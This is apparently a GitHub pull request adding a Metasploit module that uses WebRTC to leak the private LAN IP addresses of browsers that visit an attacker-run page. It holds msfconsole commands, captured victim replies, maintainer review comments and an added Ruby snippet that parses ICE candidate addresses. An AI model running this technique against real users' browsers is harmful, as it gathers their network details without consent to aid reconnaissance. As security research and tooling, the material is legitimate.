Private IP Leakage using WebRTC (CVE-2018-6849) #9823

Merged
merged 8 commits into from Apr 11, 2018


RootUp commented Apr 6, 2018

This library module will take advantage of the WebRTC function in browsers to get the private IP of the user/victim.

Verification

  • Start msfconsole
  • use auxiliary/gather/browser_lanipleak
  • set SRVHOST <IP of MSF system to act as server>
  • set SRVPORT <port of MSF system to act as server>
  • run
msf auxiliary(gather/browser_getprivateip) > 
[*] Using URL: http://172.20.10.2:8080/
[*] Server started.

msf auxiliary(gather/browser_getprivateip) >



msf auxiliary(gather/browser_getprivateip) > 
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Received reply:
POST / HTTP/1.1
Host: 172.20.10.2:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.20.10.2:8080/
Content-Length: 11
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

172.20.10.2

msf auxiliary(gather/browser_getprivateip) >

Note that there are some edge cases with this code. For example, it doesn't work on Firefox ESR on Kali 1.0.6.

@bcoles bcoles added module docs needs-docs and removed docs labels Apr 6, 2018

),
'License' => MSF_LICENSE,
'Author' => [
'Brendan Coles', #MSF Module

bcoles commented Apr 6, 2018

Thanks, but I did nothing. I literally grabbed the first chunk of JS I found on GitHub and slapped it in the module.

send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s

bcoles commented Apr 6, 2018

Please tidy up the output.

The print_* methods are preferred over puts.

Consider augmenting the JS to send a JSON object, and parsing the JS object here for output with print_good or print_line.

info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",
'Description' => %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
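Review bot: the 'Description' text in this hunk reads "using well-known property of WebRTC" and needs an article ("using a well-known property of WebRTC"); it should also state plainly what the module returns to the operator (the local IP addresses of the visiting browser) rather than only describing WebRTC in general, so the description matches the module's actual output.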

bcoles commented Apr 6, 2018

Please line wrap to max 120, preferably 80.

super(
update_info(
info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",

bcoles commented Apr 6, 2018

Single quotes are preferred over double quotes when string interpolation is not required.

Also, remove the fullstop .

Also, module names are generally short and descriptive, rather than a sentence. Consider Browser LAN IP Leak or something.

[ 'CVE', '2018-6849' ],
['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
],
'DisclosureDate' => 'Jan 26 2018',

bcoles commented Apr 6, 2018

This should probably be the date the WebRTC IP leak technique was published. The first instance I'm aware of was from https://github.com/natevw some time around 2014.


RootUp added some commits Apr 6, 2018


RootUp commented Apr 6, 2018

Works perfectly for now.

msf > use auxiliary/gather/browser_lanipleak 
msf auxiliary(gather/browser_lanipleak) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(gather/browser_lanipleak) > set URIPATH /
URIPATH => /
msf auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://127.0.0.1:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Received reply:
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/
Content-Length: 13
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

192.168.1.104

msf auxiliary(gather/browser_lanipleak) >
s0m3gai commented Apr 7, 2018

Neat! Just needs docs (example), looks like... 👍

RootUp added some commits Apr 10, 2018

Parsing IP address only
Changed title name and description; however, a few things still need to be fixed.

RootUp commented Apr 10, 2018

So the output looks something like this for now:

msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://192.168.1.104:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Received reply:
Fetched Private IP: 192.168.1.103
[*] 192.168.1.103: Received reply:
Fetched Private IP: 2001:0:9d38:90d7:3889:2388:3f57:fe98

msf auxiliary(gather/browser_lanipleak) >

bcoles commented Apr 10, 2018

Looking good.

I made some minor changes, like fixing up formatting.

I also removed the requirement for ipaddr. Instead, the module uses the same regex that's used in the JavaScript.

It was meant to be a PR on your repo, but apparently the GitHub web interface doesn't work like that, and it landed directly into your branch. My bad!
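The address-extraction step bcoles describes, as an added Ruby example that is not the module's own code (it uses Ruby's standard ipaddr library instead of the module's regex): it pulls every IP address out of constructed ICE candidate strings in the shape a browser reports them, drops duplicates, and labels each as private, link-local, loopback or public, so a reader can see which entries in a reply actually expose LAN addressing.

```ruby
# Added example, not the Metasploit module's code: extract the addresses a
# browser reports in its WebRTC ICE candidates and label the ones that
# expose LAN addressing. Uses Ruby's standard ipaddr library.
require 'ipaddr'

# Constructed sample candidate lines in the shape a browser hands to the
# RTCPeerConnection onicecandidate callback; all addresses are made up.
SAMPLE_CANDIDATES = [
  'candidate:842163049 1 udp 1677729535 192.168.1.104 54321 typ host generation 0',
  'candidate:842163049 1 udp 1677729535 fd00::9d38:90d7:3889:2388 54322 typ host generation 0',
  'candidate:1853887674 1 udp 1845501695 203.0.113.7 61000 typ srflx raddr 192.168.1.104 rport 54321',
  'candidate:2 1 udp 2122262783 fe80::1ff:fe23:4567:890a 9 typ host'
].freeze

# Every whitespace-separated token that parses as an IPv4 or IPv6 address.
# Ports, priorities and keywords such as "typ" fail to parse and are skipped.
def extract_addresses(candidate)
  candidate.split.map do |token|
    begin
      IPAddr.new(token)
    rescue IPAddr::Error
      nil
    end
  end.compact
end

# Label an address by the network scope it reveals about the client.
def classify(addr)
  return 'loopback'   if addr.loopback?
  return 'link-local' if addr.link_local?
  return 'private'    if addr.private?   # RFC 1918 ranges and fc00::/7 (ULA)
  'public'
end

# [[address_string, label], ...] in first-seen order with duplicates removed:
# the same LAN address reported both as a host candidate and as the raddr of
# a server-reflexive candidate is listed once.
def leaked_addresses(candidates)
  candidates.flat_map { |c| extract_addresses(c) }
            .uniq(&:to_s)
            .map { |a| [a.to_s, classify(a)] }
end

if $PROGRAM_NAME == __FILE__
  leaked_addresses(SAMPLE_CANDIDATES).each do |ip, label|
    puts "Found IP address: #{ip} (#{label})"
  end
end
```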


bcoles commented Apr 10, 2018

msf5 auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 1.

[*] Using URL: http://0.0.0.0:8080/asdf
[*] Local IP: http://172.16.191.188:8080/asdf
[*] Server started.

msf5 auxiliary(gather/browser_lanipleak) > [*] 172.16.191.135: Sending response (2523 bytes)
[+] 172.16.191.135: Found IP address: 172.16.191.135
[*] 172.16.191.208: Sending response (2523 bytes)
[+] 172.16.191.208: Found IP address: 172.16.191.208
[+] 172.16.191.208: Found IP address: 172.16.191.178
Interrupt: use the 'exit' command to quit

RootUp commented Apr 11, 2018

Okay, I have added documentation for the same; please advise whether we are good to land here!

@acammack-r7 acammack-r7 merged commit 8b6bfcb into rapid7:master Apr 11, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully ran sanity checks.
Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr: The Travis CI build passed

acammack-r7 added a commit that referenced this pull request Apr 11, 2018


acammack-r7 commented Apr 11, 2018

Thanks for the module! I added 7e4caa1 to give a little more sample output in the module documentation.

@acammack-r7 acammack-r7 self-assigned this Apr 11, 2018


acammack-r7 commented Apr 11, 2018

Release Notes

The auxiliary/gather/browser_lanipleak module has been added to the framework. This module leaks the local IPs of WebRTC-enabled browsers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2018
